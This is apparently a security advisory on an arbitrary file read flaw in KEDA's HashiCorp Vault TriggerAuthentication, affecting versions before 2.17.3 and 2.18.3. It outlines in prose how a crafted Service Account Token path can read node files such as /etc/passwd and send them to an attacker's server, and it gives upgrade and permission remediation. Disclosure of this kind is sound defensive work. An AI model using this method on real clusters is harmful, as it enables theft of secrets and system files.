KEDA Arbitrary File Read Vulnerability in HashiCorp Vault Authentication

An arbitrary file read vulnerability has been identified in KEDA versions prior to 2.17.3 and 2.18.3. This vulnerability affects KEDA resources that use TriggerAuthentication to configure HashiCorp Vault authentication. The issue arises from inadequate path validation when loading the Service Account Token specified in the HashiCorp Vault credential. An attacker with permission to create or modify a TriggerAuthentication resource can exploit this vulnerability to exfiltrate files from the node's filesystem where the KEDA pod is running. The exfiltrated files could include sensitive information such as secrets, keys, or system files like /etc/passwd.

Impact

Exploitation of this vulnerability allows for arbitrary file read, with the potential to exfiltrate sensitive system information to a remote server.

Reproduction

To reproduce this vulnerability, create or modify a TriggerAuthentication resource in KEDA with a maliciously crafted Service Account Token path that points to a file containing sensitive information. Once the TriggerAuthentication is applied, the KEDA pod will read the file and can be configured to send its contents to a server under the attacker's control, thereby exfiltrating the data.

Remediation

Users can upgrade to KEDA versions 2.17.3, 2.18.3, or 2.19.0 to address this vulnerability. Additionally, it is recommended to restrict permissions for creating and modifying TriggerAuthentication resources to trusted and authorized users only.